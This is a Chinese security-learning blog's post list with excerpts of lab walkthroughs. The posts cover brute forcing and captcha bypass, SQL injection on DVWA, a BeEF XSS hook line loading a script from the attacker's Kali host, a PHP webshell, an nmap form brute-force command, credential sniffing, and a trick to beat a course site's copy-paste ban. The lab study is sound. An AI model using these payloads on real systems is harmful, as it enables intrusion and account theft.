- 博客(14)
- 收藏
- 关注
原创 pikacu暴力破解第四关token防爆破?
这一套流程是这样的,请求后得到一个包含token 的响应包,然后再次请求的时候,会提交上一次token,然后再返回一个下一个所需 token 的包,然后循环下去。因此此处就是从响应包里提取token然后拿去提交下一次 的,绕过验证。这里先详解一下这里指的token是什么,用来干什么的 简单来说就是一种令牌,是由服务器生成的字符串,用于客户端在请求数据的时候作为身份验证的凭证,再次提交的token会与已被保存的进行比较,不一样就会出错误。置检索提取,将每次响应包中的token提取。
2025-12-25 13:51:50
303
原创 pikacu暴力破解第三关验证码绕过(on client)
但是验证码正确一次后,就算即使后面验证码不对,还是可以正常检测账户密码,第二关一样直接爆破就行。这关跟上一关不一样的地方在于他只要验证码错误会直接弹出。
2025-12-24 14:25:55
329
原创 pikacu暴力破解第二关验证码绕过(on server)
抓了两次发现一个有趣的事情,只要页面不刷新,验证码不会变(页面不刷新是因为我们在拦截。所以说这一关跟第一关的区别只是多了一个固定不动的验证码(说实话一开始我以为很难来的。总之还是先抓包,怎么抓包可以参考我的pikacu第一关攻略。依旧发送给intruder暴力破解。这一关跟第一关差不太多。依旧是找到长度最短的。
2025-12-24 13:14:08
285
原创 SQL注入部分:DVWA+SQLmap+Mysql注入实战
实验环境搭建。启动Metasploitable2虚拟机。输入账号密码【msfadmin】,输入【ip a】查询ip浏览器输入ip,登录dvwa注入点发现。首先肯定是要判断是否有注入漏洞。记得先把保护调成low在输入框输入1,返回ID: 1返回正常;再次输入1',报错,返回此时可以断定有SQL注入漏洞,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)
2025-12-23 14:51:16
914
原创 XSS漏洞攻击
3.访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板, <script src="http://Kali的IP地址:3000/hook.js"></script>。1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页。2.Kali使用beef生成恶意代码。
2025-12-19 11:23:03
213
原创 一句话木马(蚁剑控制kali)
然后在/var/www/html目录下放入一句话木马:<?>(记得用root身份打开),ant就是我们的链接密码,可以随自己喜好改。然后打开蚁剑,右键空白处添加数据,就改三个地方url地址就是kali的ip加上木马的文件名字。双击打开建立的链接或者右键链接打开虚拟终端,我们就可以控制kali了。检查服务器是否搭建成功(在window的浏览器打开kali的ip。首先用kali搭建apache服务器。
2025-12-16 21:01:22
122
原创 pikachu靶场第一关基于表单的暴力破解攻略
回到pikachu(自己的浏览器,如果是burp的浏览器记得把捕获关了噢),输入正确的用户名和密码,点login。接着开始选择字典,自己去网上找常用的字典,以txt形式保存然后用load加载出来(两个都要哦)打开burp的浏览器后不要惊慌,在网址处输入pikachu的网址。我们用length筛选正确的用户名和密码,其中最短的是正确的。找到我们刚刚捕获的请求,选中这些请求发送给Intruder。然后在intruder中打开,把开头结尾的这个符号删去。然后随便输入一个用户名和密码,记住先不要login。
2025-12-11 12:53:36
511
原创 wiresharkp抓包登录界面用户名和密码
找到login后在下面找到user_account,user_password。然后输入ip.dst == 10.0.1.5筛选流量。首先打开wiresharkp抓包。后用base64解码得到密码。输入账号密码后截至抓包。
2025-12-03 18:49:08
181
原创 头歌如何在禁止复制黏贴的时候使用复制黏贴
点击他,再回到这个界面,效果如下。变成这样之后就不要再动了,我们要做的是切换页面。选中这些文字拖动到11111的下面那个框。将你的目标代码复制粘贴到qq对话框中。然后将你要粘贴的地方换成11111。首先按ctrl + f,唤出神器。开始教学,首先我们该怎么复制呢。可以看到复制黏贴都是做不到的。像这样然后鼠标右键蓝色部分。你就发现,你可以复制了。首先选择你要复制的部分。
2025-12-03 18:48:43
148
原创 kali使用nmap
输入nmap -p80 --script http-form-brute --script-args http-form-brute.path=/dvwa/login.php 192.168.226.130 -d。5.1利用NMAP扫描Metasploitable2(需下载虚拟机镜像)的端口开放情况。说明其中四个端口的提供的服务,查阅资料,简要说明该服务的功能。5.2利用NMAP扫描Metasploitable2的操作系统类型,并附截图。
2025-12-02 11:13:40
170
原创 网络扫描与网络侦察
目的IP地址为:202.193.64.34,回答问题:该用户使用的什么品牌的设备,访问的是什么网站?ipconfig/ifconfig显示的是设备在局域网内的私有IP地址,仅在本地网络有效。whatismyipaddress.com显示的是路由器对外的公网IP地址,这是互联网上其他服务器看到的你的地址。不相同,原因是互联网公网IPv4地址稀缺,运营商为每个家庭/企业只分配一个公网IP。,安全问题: 大量第三方插件和主题代码质量参差不齐,存在SQL注入、跨站脚本(XSS)、任意文件上传、权限绕过等漏洞。
2025-12-02 10:24:07
414
原创 用wireshark抓取局域网中QQ聊天发送的图片
5.现在在过滤网选择“十六进制值”,输入ff d8,过滤得到所捕获的照片。并选中,右键,点击追踪流,选择TCP追踪流。8.打开101 Editor后,直接将文件拖入进去,ctrl + f 搜索FF D8,将之前的内容全部删除。使用工具wireshark这个网络抓包工具,和101 Editor十六进制编辑器。6.选择原始数据,按图中选项选择,另存为;2.打开wirehark,选择WLAN,点击开始捕获。7.保存(保存时注意加文件后缀名为jpg的形式)3.用手机发送一个张照片到“我的电脑”
2025-11-17 19:54:55
267
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅